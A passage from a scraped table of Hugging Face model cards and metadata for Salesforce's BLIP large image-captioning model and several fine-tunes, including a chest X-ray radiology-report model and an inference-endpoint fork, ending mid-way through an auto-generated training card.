| 31 |
+
#### Running the model on CPU
|
| 32 |
+
|
| 33 |
+
<details>
|
| 34 |
+
<summary> Click to expand </summary>
|
| 35 |
+
|
| 36 |
+
```python
|
| 37 |
+
import requests
|
| 38 |
+
from PIL import Image
|
| 39 |
+
from transformers import BlipProcessor, BlipForConditionalGeneration
|
| 40 |
+
|
| 41 |
+
processor = BlipProcessor.from_pretrained(""Salesforce/blip-image-captioning-large"")
|
| 42 |
+
model = BlipForConditionalGeneration.from_pretrained(""Salesforce/blip-image-captioning-large"")
|
| 43 |
+
|
| 44 |
+
img_url = 'https://storage.googleapis.com/sfr-vision-language-research/BLIP/demo.jpg'
|
| 45 |
+
raw_image = Image.open(requests.get(img_url, stream=True).raw).convert('RGB')
|
| 46 |
+
|
| 47 |
+
# conditional image captioning
|
| 48 |
+
text = ""a photography of""
|
| 49 |
+
inputs = processor(raw_image, text, return_tensors=""pt"")
|
| 50 |
+
|
| 51 |
+
out = model.generate(**inputs)
|
| 52 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 53 |
+
|
| 54 |
+
# unconditional image captioning
|
| 55 |
+
inputs = processor(raw_image, return_tensors=""pt"")
|
| 56 |
+
|
| 57 |
+
out = model.generate(**inputs)
|
| 58 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 59 |
+
```
|
| 60 |
+
</details>
|
| 61 |
+
|
| 62 |
+
#### Running the model on GPU
|
| 63 |
+
|
| 64 |
+
##### In full precision
|
| 65 |
+
|
| 66 |
+
<details>
|
| 67 |
+
<summary> Click to expand </summary>
|
| 68 |
+
|
| 69 |
+
```python
|
| 70 |
+
import requests
|
| 71 |
+
from PIL import Image
|
| 72 |
+
from transformers import BlipProcessor, BlipForConditionalGeneration
|
| 73 |
+
|
| 74 |
+
processor = BlipProcessor.from_pretrained(""Salesforce/blip-image-captioning-large"")
|
| 75 |
+
model = BlipForConditionalGeneration.from_pretrained(""Salesforce/blip-image-captioning-large"").to(""cuda"")
|
| 76 |
+
|
| 77 |
+
img_url = 'https://storage.googleapis.com/sfr-vision-language-research/BLIP/demo.jpg'
|
| 78 |
+
raw_image = Image.open(requests.get(img_url, stream=True).raw).convert('RGB')
|
| 79 |
+
|
| 80 |
+
# conditional image captioning
|
| 81 |
+
text = ""a photography of""
|
| 82 |
+
inputs = processor(raw_image, text, return_tensors=""pt"").to(""cuda"")
|
| 83 |
+
|
| 84 |
+
out = model.generate(**inputs)
|
| 85 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 86 |
+
|
| 87 |
+
# unconditional image captioning
|
| 88 |
+
inputs = processor(raw_image, return_tensors=""pt"").to(""cuda"")
|
| 89 |
+
|
| 90 |
+
out = model.generate(**inputs)
|
| 91 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 92 |
+
```
|
| 93 |
+
</details>
|
| 94 |
+
|
| 95 |
+
##### In half precision (`float16`)
|
| 96 |
+
|
| 97 |
+
<details>
|
| 98 |
+
<summary> Click to expand </summary>
|
| 99 |
+
|
| 100 |
+
```python
|
| 101 |
+
import torch
|
| 102 |
+
import requests
|
| 103 |
+
from PIL import Image
|
| 104 |
+
from transformers import BlipProcessor, BlipForConditionalGeneration
|
| 105 |
+
|
| 106 |
+
processor = BlipProcessor.from_pretrained(""Salesforce/blip-image-captioning-large"")
|
| 107 |
+
model = BlipForConditionalGeneration.from_pretrained(""Salesforce/blip-image-captioning-large"", torch_dtype=torch.float16).to(""cuda"")
|
| 108 |
+
|
| 109 |
+
img_url = 'https://storage.googleapis.com/sfr-vision-language-research/BLIP/demo.jpg'
|
| 110 |
+
raw_image = Image.open(requests.get(img_url, stream=True).raw).convert('RGB')
|
| 111 |
+
|
| 112 |
+
# conditional image captioning
|
| 113 |
+
text = ""a photography of""
|
| 114 |
+
inputs = processor(raw_image, text, return_tensors=""pt"").to(""cuda"", torch.float16)
|
| 115 |
+
|
| 116 |
+
out = model.generate(**inputs)
|
| 117 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 118 |
+
# >>> a photography of a woman and her dog
|
| 119 |
+
|
| 120 |
+
# unconditional image captioning
|
| 121 |
+
inputs = processor(raw_image, return_tensors=""pt"").to(""cuda"", torch.float16)
|
| 122 |
+
|
| 123 |
+
out = model.generate(**inputs)
|
| 124 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 125 |
+
>>> a woman sitting on the beach with her dog
|
| 126 |
+
```
|
| 127 |
+
</details>
|
| 128 |
+
|
| 129 |
+
## Ethical Considerations
|
| 130 |
+
This release is for research purposes only in support of an academic paper. Our models, datasets, and code are not specifically designed or evaluated for all downstream purposes. We strongly recommend users evaluate and address potential concerns related to accuracy, safety, and fairness before deploying this model. We encourage users to consider the common limitations of AI, comply with applicable laws, and leverage best practices when selecting use cases, particularly for high-risk scenarios where errors or misuse could significantly impact people’s lives, rights, or safety. For further guidance on use cases, refer to our AUP and AI AUP.
|
| 131 |
+
|
| 132 |
+
## BibTex and citation info
|
| 133 |
+
|
| 134 |
+
```
|
| 135 |
+
@misc{https://doi.org/10.48550/arxiv.2201.12086,
|
| 136 |
+
doi = {10.48550/ARXIV.2201.12086},
|
| 137 |
+
|
| 138 |
+
url = {https://arxiv.org/abs/2201.12086},
|
| 139 |
+
|
| 140 |
+
author = {Li, Junnan and Li, Dongxu and Xiong, Caiming and Hoi, Steven},
|
| 141 |
+
|
| 142 |
+
keywords = {Computer Vision and Pattern Recognition (cs.CV), FOS: Computer and information sciences, FOS: Computer and information sciences},
|
| 143 |
+
|
| 144 |
+
title = {BLIP: Bootstrapping Language-Image Pre-training for Unified Vision-Language Understanding and Generation},
|
| 145 |
+
|
| 146 |
+
publisher = {arXiv},
|
| 147 |
+
|
| 148 |
+
year = {2022},
|
| 149 |
+
|
| 150 |
+
copyright = {Creative Commons Attribution 4.0 International}
|
| 151 |
+
}
|
| 152 |
+
```","{""id"": ""Salesforce/blip-image-captioning-large"", ""author"": ""Salesforce"", ""sha"": ""353689b859fcf0523410b1806dace5fb46ecdf41"", ""last_modified"": ""2025-02-03 06:42:42+00:00"", ""created_at"": ""2022-12-13 11:27:40+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 2428198, ""downloads_all_time"": null, ""likes"": 1309, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": ""warm"", ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""tf"", ""safetensors"", ""blip"", ""image-text-to-text"", ""image-captioning"", ""image-to-text"", ""arxiv:2201.12086"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: bsd-3-clause\npipeline_tag: image-to-text\ntags:\n- image-captioning\nlanguages:\n- en"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tf_model.h5', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [""microsoft/HuggingGPT"", ""fffiloni/text-guided-image-colorization"", ""xingpng/CSGO"", ""TencentARC/Caption-Anything"", ""IDEA-Research/Grounded-SAM"", ""haodongli/LucidDreamer"", ""sam-hq-team/sam-hq"", ""TencentARC/BrushEdit"", ""openfree/ColorRevive"", ""tonyassi/blip-image-captioning-large"", ""resul-ai/comparing-captioning-models"", ""linfanluntan/Grounded-SAM"", ""GeorgiosIoannouCoder/cuny-tech-prep-tutorial-1"", ""radames/Candle-BLIP-Image-Captioning"", ""Claudz163/Image-To-Character-Text"", ""hysts/image-captioning-with-blip"", ""ybelkada/blip-image-captioning-space-large"", ""PAIR/StreamingSVD"", ""JournalistsonHF/text-to-image-bias"", ""faisalhr1997/blip-image-captioning-space-large"", ""matanmichaely/image_to_audio_story"", ""taesiri/HuggingGPT-Lite"", ""LuckRafly/Chat-with-an-Image-GeminiAI"", ""mouaddb/image2text-comp"", ""NeurixYUFI/img2txt"", ""gradio-client-demos/comparing-captioning-models"", ""weijiawu/ImageEditAnything"", ""xeonm/image-to-audio-story"", ""Kvikontent/Image2Music"", ""at2507/Img2Text_blip_v1"", ""clem/comparing-captioning-models"", ""jesoteric/Grounded-SAM"", ""techasad/image-to-audio-story"", ""xhk/ASAM"", ""Jangai/Describer"", ""sungyi654/Image_Narration"", ""none-yet/Xylaria"", ""multimodalart/pix2pix-zero"", ""kasun/git-large"", ""aTrapDeer/Img2TimDillonRant"", ""kviai/your-girl-ai"", ""PeachTechAI/COLLEAGUE-AI"", ""Kvikontent/ChatGPT-Vision"", ""xuyingliKepler/KET"", ""GenAILearniverse/image_captioning"", ""Pontonkid/Image-Audio-Description"", ""beingcognitive/Image_to_Music"", ""Lap1official/Xylaria-chat"", ""dhanushreddy29/comparing-captioning-models"", ""kasun/comparing-captioning-models"", ""spuun/blip-api"", ""kasun/blip-large"", ""ikechan8370/cp-extra"", ""Mediocreatmybest/PipelineImageCaption"", ""manutej/imagedemo1"", ""javeed3030/FreeAI"", ""dreamdrop-art/000555111"", ""jitubutwal1441/image-to-story"", ""Reiner4/extras"", ""ASAM-Team/ASAM"", ""flocolombari/COLOMBARI_VIGNES-FERRINO_DERNIAUX_NIYONKURU"", ""ruslanmv/Image-To-Text"", ""malay-91418/image-info"", ""evijit/text-to-image-bias"", ""HongcanGuo/InspiroV"", ""Primajin/blip-image-captioning-large"", ""VDNT11/Multilingual-Assistive-Model"", ""Lap1official/API"", ""Taizun/Image-captioning"", ""ccarr0807/HuggingGPT"", ""theholycityweb/HuggingGPT"", ""xxx1/VQA_CAP_GPT"", ""Alfasign/HuggingGPT-Lite"", ""Anandx05/image-captioning-mscoco"", ""saurshaz/HuggingGPT"", ""batmac/captioner"", ""redo62/image2text-comp"", ""VIPLab/Caption-Anything"", ""ZhaoYoujia/ImageRecognition"", ""muneebashraf/Visual-Sentiment-Analyzer"", ""santoshNA/Image_caption_description"", ""DQChoi/image_sticker"", ""joaomorossini/image_captioning_model_comparison"", ""keplersj/photo-merge"", ""alecinvan/image-captioning-tts"", ""harizh/rizlore"", ""lingkoai/Salesforce-blip-image-captioning-large"", ""MelodyYuuka/image-captioning-with-blip"", ""Kevin8881038/SillyTavern_extras"", ""Samlund56/blip-image-captioning-large"", ""gasbaoui/Instagram-post-improvement"", ""itskarelleh/alt-text-mage"", ""czwQAQ/extras"", ""Dendup/image_to_story_generation.app"", ""alecinvan/flotationMultiModalRobot"", ""zzzzred/extras"", ""MosaHosseini/Image2story"", ""Slyfox12/img2poem"", ""Anew1007/extras"", ""mixcard/blip-image-captioning-large""], ""safetensors"": {""parameters"": {""I64"": 512, ""F32"": 469732924}, ""total"": 469733436}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-03 06:42:42+00:00"", ""cardData"": ""license: bsd-3-clause\npipeline_tag: image-to-text\ntags:\n- image-captioning\nlanguages:\n- en"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""639861ac02d4b462c93d29f5"", ""modelId"": ""Salesforce/blip-image-captioning-large"", ""usedStorage"": 7519815588}",0,"https://huggingface.co/adibvafa/BLIP-MIMIC-CXR, https://huggingface.co/pimcore/IEP__image-capturing-large, https://huggingface.co/shyamgv/blip-image-captioning-large-shyam, https://huggingface.co/welcometoFightclub/llmachatbot, https://huggingface.co/Jakapong/jakudon, https://huggingface.co/rcfg/FashionBLIP-1, https://huggingface.co/manh08/blip-model, https://huggingface.co/saakshigupta/blip-finetuned-gradcam, https://huggingface.co/saakshigupta/blip-finetuned-gradcam-optimized, https://huggingface.co/saakshigupta/deepfake-blip-large",10,,0,,0,,0,"Claudz163/Image-To-Character-Text, JournalistsonHF/text-to-image-bias, LuckRafly/Chat-with-an-Image-GeminiAI, fffiloni/text-guided-image-colorization, hysts/image-captioning-with-blip, matanmichaely/image_to_audio_story, openfree/ColorRevive, radames/Candle-BLIP-Image-Captioning, resul-ai/comparing-captioning-models, sam-hq-team/sam-hq, tonyassi/blip-image-captioning-large, xingpng/CSGO",12
|
| 153 |
+
adibvafa/BLIP-MIMIC-CXR,"---
|
| 154 |
+
library_name: transformers
|
| 155 |
+
tags:
|
| 156 |
+
- Radiology
|
| 157 |
+
- BLIP
|
| 158 |
+
- MIMIC-CXR
|
| 159 |
+
- Healthcare
|
| 160 |
+
- X-Ray
|
| 161 |
+
- PyTorch
|
| 162 |
+
license: apache-2.0
|
| 163 |
+
base_model:
|
| 164 |
+
- Salesforce/blip-image-captioning-large
|
| 165 |
+
pipeline_tag: image-text-to-text
|
| 166 |
+
---
|
| 167 |
+
|
| 168 |
+
# RadioCare
|
| 169 |
+

|
| 170 |
+
|
| 171 |
+
**PLEASE REQUEST ACCESS WITH YOUR MIMIC-CXR ACCESS RIGHT TO APPROVE**
|
| 172 |
+
|
| 173 |
+
## About
|
| 174 |
+
This is the model checkpoint for BLIP (""Salesforce/blip-image-captioning-large"") finetuned on the MIMIC-CXR dataset and generates accurate radiology reports given an chest X-ray and a clinical indication (e.g. 'eval for pneumonia').
|
| 175 |
+
Training and inference code is provided in [GitHub repository](https://github.com/Adibvafa/RadioCareBorealisAI)
|
| 176 |
+
<br><br>
|
| 177 |
+
|
| 178 |
+
## Code
|
| 179 |
+
```python
|
| 180 |
+
from PIL import Image
|
| 181 |
+
from transformers import BlipForConditionalGeneration, BlipProcessor
|
| 182 |
+
|
| 183 |
+
# Load model
|
| 184 |
+
processor = BlipProcessor.from_pretrained(""adibvafa/BLIP-MIMIC-CXR"")
|
| 185 |
+
model = BlipForConditionalGeneration.from_pretrained(""adibvafa/BLIP-MIMIC-CXR"")
|
| 186 |
+
|
| 187 |
+
# Load data
|
| 188 |
+
image = 'chest-x-ray.jpg'
|
| 189 |
+
prompt = 'final report\nexamination: chest (pa and lat)\nindication: ___f with chest pressure, uri sx, voice change.'
|
| 190 |
+
|
| 191 |
+
# Process inputs
|
| 192 |
+
inputs = processor(
|
| 193 |
+
images=Image.open(image),
|
| 194 |
+
text=prompt,
|
| 195 |
+
return_tensors=""pt""
|
| 196 |
+
)
|
| 197 |
+
|
| 198 |
+
# Generate radiology report
|
| 199 |
+
output = model.generate(**inputs, max_length=512)
|
| 200 |
+
report = processor.decode(output[0], skip_special_tokens=True)
|
| 201 |
+
```
|
| 202 |
+
|
| 203 |
+
```
|
| 204 |
+
### report will be like follows:
|
| 205 |
+
final report
|
| 206 |
+
examination : chest ( pa and lat )
|
| 207 |
+
indication : ___f with chest pressure, uri sx, voice change.
|
| 208 |
+
comparison : none
|
| 209 |
+
findings : pa and lateral views of the chest provided. there is no focal consolidation, effusion, or pneumothorax. the cardiomediastinal silhouette is normal. imaged osseous structures are intact. no free air below the right hemidiaphragm is seen.
|
| 210 |
+
impression : no acute intrathoracic process.
|
| 211 |
+
```
|
| 212 |
+
<br>
|
| 213 |
+
|
| 214 |
+
## Demo
|
| 215 |
+

|
| 216 |
+
<br>
|
| 217 |
+
|
| 218 |
+
## Introduction
|
| 219 |
+
Radiocare aims to develop a cutting-edge image-to-text model that generates accurate radiology reports and diagnoses for chest X-ray images. By leveraging the BLIP and Vision Transformer architectures, Radiocare seeks to streamline the diagnostic process, enabling faster and more accurate identification of health issues. This project addresses the critical need for timely and precise radiological assessments, especially in rural areas with limited access to healthcare. Ultimately, Radiocare strives to improve patient outcomes and bridge the gap in healthcare accessibility across Canada.
|
| 220 |
+
<br><br>
|
| 221 |
+
|
| 222 |
+
## Methods
|
| 223 |
+
|
| 224 |
+
### Data
|
| 225 |
+
Radiocare utilizes data from the MIMIC-CXR database on PhysioNet, consisting of a large collection of chest X-ray images and associated radiology reports. This dataset provides a comprehensive source of medical images essential for training and evaluating the model.
|
| 226 |
+
<br><br>
|
| 227 |
+
|
| 228 |
+
### Model Architecture
|
| 229 |
+
Radiocare employs the BLIP (Bootstrapped Language-Image Pre-training) model, which integrates the Vision Transformer (ViT) architecture with a text decoder. ViT processes images by dividing them into fixed-size patches, transforming these patches into high-dimensional vectors, and then embedding them into tokens. The self-attention mechanism in ViT captures global dependencies across patches, enhancing the model's understanding of the entire image. The text decoder translates these visual features into coherent radiology reports, enabling detailed and accurate diagnostics.
|
| 230 |
+
<br><br>
|
| 231 |
+
|
| 232 |
+
## Results
|
| 233 |
+
Radiocare's model can assess a chest X-ray in approximately 3 seconds, providing doctors with a 99% faster diagnostic process. Key performance metrics include:
|
| 234 |
+
|
| 235 |
+
- **Bert Socre**: 47.2
|
| 236 |
+
- **RadGraph**: 26.1
|
| 237 |
+
<br><br>
|
| 238 |
+
|
| 239 |
+
## Discussion
|
| 240 |
+
Radiocare represents a significant advancement in the field of medical diagnostics by leveraging state-of-the-art AI techniques to generate accurate and timely radiology reports from chest X-ray images. The integration of the BLIP model and Vision Transformer architecture enhances the diagnostic process, ensuring faster and more reliable results. By addressing the critical healthcare needs, especially in underserved rural areas, Radiocare has the potential to improve patient outcomes and bridge the gap in healthcare accessibility across Canada.
|
| 241 |
+
<br><br>
|
| 242 |
+
|
| 243 |
+
## Team Information
|
| 244 |
+
Radiocare is part of the Spring 2024 cohort of Borealis AI's ""Let's SOLVE It"" program. The project team includes:
|
| 245 |
+
- [Adibvafa Fallahpour](https://adibvafa.github.io/Portfolio/)
|
| 246 |
+
- [Archita Srivastava](https://www.linkedin.com/in/archita7/)
|
| 247 |
+
- [Mantaj Dhillon](https://www.linkedin.com/in/mantaj-dhillon/)
|
| 248 |
+
- [Grace Liu](https://www.linkedin.com/in/gracelliu/)
|
| 249 |
+
<br><br>
|
| 250 |
+
|
| 251 |
+
## Repository Structure
|
| 252 |
+
The repository is organized as follows:
|
| 253 |
+
- **data_modules/**: Contains data loading and preprocessing scripts.
|
| 254 |
+
- **evals/**: Includes evaluation scripts and metrics calculation.
|
| 255 |
+
- **models/**: Contains the different model architectures.
|
| 256 |
+
- **blip/**: Final model implementation using BLIP and ViT.
|
| 257 |
+
- **cnn/**: Convolutional neural network models.
|
| 258 |
+
- **vit/**: Vision Transformer models.
|
| 259 |
+
- **utils/**: Utility functions for the project.
|
| 260 |
+
- **slurm/**: SLURM batch scripts for running jobs on a computing cluster.
|
| 261 |
+
<br><br>
|
| 262 |
+
|
| 263 |
+
## Citation
|
| 264 |
+
|
| 265 |
+
If you use this work in your research, please cite:
|
| 266 |
+
|
| 267 |
+
```
|
| 268 |
+
@misc {adibvafa_fallahpour_2024,
|
| 269 |
+
author = { Fallahpour, Adibvafa and Srivastava, Archita and Dhillon, Mantaj and Liu, Grace },
|
| 270 |
+
title = { BLIP-MIMIC-CXR },
|
| 271 |
+
year = 2024,
|
| 272 |
+
url = { https://huggingface.co/adibvafa/BLIP-MIMIC-CXR },
|
| 273 |
+
doi = { 10.57967/hf/3207 },
|
| 274 |
+
publisher = { Hugging Face }
|
| 275 |
+
}
|
| 276 |
+
```","{""id"": ""adibvafa/BLIP-MIMIC-CXR"", ""author"": ""adibvafa"", ""sha"": ""68bbaafa089a4ca4fa25653cc77cbedbbda1c7fa"", ""last_modified"": ""2025-01-11 03:28:52+00:00"", ""created_at"": ""2024-10-08 16:20:34+00:00"", ""private"": false, ""gated"": ""auto"", ""disabled"": false, ""downloads"": 55, ""downloads_all_time"": null, ""likes"": 6, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""blip"", ""image-text-to-text"", ""Radiology"", ""BLIP"", ""MIMIC-CXR"", ""Healthcare"", ""X-Ray"", ""PyTorch"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""doi:10.57967/hf/3207"", ""license:apache-2.0"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- Radiology\n- BLIP\n- MIMIC-CXR\n- Healthcare\n- X-Ray\n- PyTorch"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 469732924}, ""total"": 469732924}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-11 03:28:52+00:00"", ""cardData"": ""base_model:\n- Salesforce/blip-image-captioning-large\nlibrary_name: transformers\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- Radiology\n- BLIP\n- MIMIC-CXR\n- Healthcare\n- X-Ray\n- PyTorch"", ""transformersInfo"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""_id"": ""67055bd22ca275d090a3e2b2"", ""modelId"": ""adibvafa/BLIP-MIMIC-CXR"", ""usedStorage"": 1879010480}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=adibvafa/BLIP-MIMIC-CXR&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Badibvafa%2FBLIP-MIMIC-CXR%5D(%2Fadibvafa%2FBLIP-MIMIC-CXR)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 277 |
+
pimcore/IEP__image-capturing-large,"---
|
| 278 |
+
tags:
|
| 279 |
+
- vision
|
| 280 |
+
- image-to-text
|
| 281 |
+
- endpoints-template
|
| 282 |
+
inference: false
|
| 283 |
+
pipeline_tag: image-to-text
|
| 284 |
+
base_model: Salesforce/blip-image-captioning-large
|
| 285 |
+
library_name: generic
|
| 286 |
+
---
|
| 287 |
+
|
| 288 |
+
# Fork of [Salesforce/blip-image-captioning-large](https://huggingface.co/Salesforce/blip-image-captioning-large) for a `image-to-text` Inference endpoint.
|
| 289 |
+
|
| 290 |
+
> Inspired by https://huggingface.co/sergeipetrov/blip_captioning
|
| 291 |
+
|
| 292 |
+
This repository implements a `custom` task for `image-to-text` for 🤗 Inference Endpoints to allow image capturing.
|
| 293 |
+
The code for the customized pipeline is in the handler.py.
|
| 294 |
+
|
| 295 |
+
To use deploy this model an Inference Endpoint you have to select `Custom` as task to use the `handler.py` file.
|
| 296 |
+
|
| 297 |
+
### expected Request payload
|
| 298 |
+
|
| 299 |
+
Image to be labeled as binary.
|
| 300 |
+
|
| 301 |
+
#### CURL
|
| 302 |
+
|
| 303 |
+
```
|
| 304 |
+
curl URL \
|
| 305 |
+
-X POST \
|
| 306 |
+
--data-binary @car.png \
|
| 307 |
+
-H ""Content-Type: image/png""
|
| 308 |
+
```
|
| 309 |
+
|
| 310 |
+
#### Python
|
| 311 |
+
|
| 312 |
+
```python
|
| 313 |
+
requests.post(ENDPOINT_URL, headers={""Content-Type"": ""image/png""}, data=open(""car.png"", 'rb').read()).json()
|
| 314 |
+
```","{""id"": ""pimcore/IEP__image-capturing-large"", ""author"": ""pimcore"", ""sha"": ""83bfe0f7c930802cc834f71d80efef789903fd12"", ""last_modified"": ""2024-02-07 15:53:53+00:00"", ""created_at"": ""2024-02-07 15:52:17+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""generic"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""generic"", ""vision"", ""image-to-text"", ""endpoints-template"", ""base_model:Salesforce/blip-image-captioning-large"", ""base_model:finetune:Salesforce/blip-image-captioning-large"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: generic\npipeline_tag: image-to-text\ntags:\n- vision\n- image-to-text\n- endpoints-template\ninference: false"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='.gitignore', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='handler.py', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-02-07 15:53:53+00:00"", ""cardData"": ""base_model: Salesforce/blip-image-captioning-large\nlibrary_name: generic\npipeline_tag: image-to-text\ntags:\n- vision\n- image-to-text\n- endpoints-template\ninference: false"", ""transformersInfo"": null, ""_id"": ""65c3a7319596b0b3b84a92b0"", ""modelId"": ""pimcore/IEP__image-capturing-large"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=pimcore/IEP__image-capturing-large&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bpimcore%2FIEP__image-capturing-large%5D(%2Fpimcore%2FIEP__image-capturing-large)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 315 |
+
shyamgv/blip-image-captioning-large-shyam,"---
|
| 316 |
+
library_name: transformers
|
| 317 |
+
license: bsd-3-clause
|
| 318 |
+
base_model: Salesforce/blip-image-captioning-large
|
| 319 |
+
tags:
|
| 320 |
+
- generated_from_trainer
|
| 321 |
+
datasets:
|
| 322 |
+
- imagefolder
|
| 323 |
+
model-index:
|
| 324 |
+
- name: blip-image-captioning-large-shyam
|
| 325 |
+
results: []
|
| 326 |
+
---
|
| 327 |
+
|
| 328 |
+
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
|
| 329 |
+
should probably proofread and complete it, then remove this comment. -->
|
| 330 |
+
|
| 331 |
+
# blip-image-captioning-large-shyam
|
| 332 |
+
|
| 333 |
+
This model is a fine-tuned version of [Salesforce/blip-image-captioning-large](https://huggingface.co/Salesforce/blip-image-captioning-large) on the imagefolder dataset.
|
| 334 |
+
It achieves the following results on the evaluation set:
|
| 335 |
+
- Loss: 0.2169
|
| 336 |
+
- Wer Score: 0.9091
|
| 337 |
+
|
| 338 |
+
## Model description
|
| 339 |
+
|
| 340 |
+
More information needed
|
| 341 |
+
|
| 342 |
+
## Intended uses & limitations
|
| 343 |
+
|
| 344 |
+
More information needed
|
| 345 |
+
|
| 346 |
+
## Training and evaluation data
|
| 347 |
+
|
| 348 |
+
More information needed
|
| 349 |
+
|
| 350 |
+
## Training procedure
|
| 351 |
+
|
| 352 |
+
### Training hyperparameters
|
| 353 |
+
|
| 354 |
+
The following hyperparameters were used during training:
|
| 355 |
+
- learning_rate: 5e-05
|
| 356 |
+
- train_batch_size: 2
|
| 357 |
+
- eval_batch_size: 2
|
| 358 |
+
- seed: 42
|
| 359 |
+
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
|
| 360 |
+
- lr_scheduler_type: linear
|
| 361 |
+
- num_epochs: 15
|
| 362 |
+
- mixed_precision_training: Native AMP
|
| 363 |
+
|
| 364 |
+
### Training results
|
| 365 |
+
|
| 366 |
+
| Training Loss | Epoch | Step | Validation Loss | Wer Score |
